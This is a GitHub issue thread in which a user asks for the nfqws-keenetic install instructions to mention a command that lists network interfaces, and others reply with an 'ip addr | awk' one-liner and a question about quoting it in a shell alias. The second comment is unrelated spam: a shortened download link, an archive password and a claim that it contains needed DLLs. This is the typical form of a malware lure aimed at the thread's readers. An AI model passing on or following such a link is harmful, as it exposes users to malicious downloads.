### ISSUE TITLE
[Feature request] - улучшение инструции на главной

### ISSUE THREAD

**Issue by Neytrino-OnLine** [Anonym-tsk/nfqws-keenetic#57]
У меня 2 подключения к провайдерам, раньше (когда был установочный диалог) - можно было посмотреть список интерфейсов, IP-шники на них и сделать выводы.
Сейчас - всё на автомате. Может упомянуть в инструкции команду - которой можно вывести список интерфейсов (как в раннем процессе установки)?

**Comment by Kevin-Otalvares** [comment]
download
https://bit.ly/4gABgKn
Archive password: changeme
I put the necessary dlls in the archive

**Comment by thenikitadant** [comment]
ip addr show | awk -F" |/" '{gsub(/^ +/,"")}/inet /{print $(NF), $2}'

**Comment by thenikitadant** [comment]
> У меня 2 подключения к провайдерам, раньше (когда был установочный диалог) - можно было посмотреть список интерфейсов, IP-шники на них и сделать выводы. Сейчас - всё на автомате. Может упомянуть в инструкции команду - которой можно вывести список интерфейсов (как в раннем процессе установки)?

ip addr show | awk -F" |/" '{gsub(/^ +/,"")}/inet /{print $(NF), $2}'

**Comment by Neytrino-OnLine** [comment]
thenikitadant, спасибо, от безысходности - (уже) пришлось найти её самому (среди функций установщика)...

Может вы подскажите, как запихнуть её в команду добавляющую псевдоним?
echo "alias n-start='...'" >> /opt/etc/profile
Пробовал ставить / перед кавычками, но строка (всё равно) добавляется не целиком...
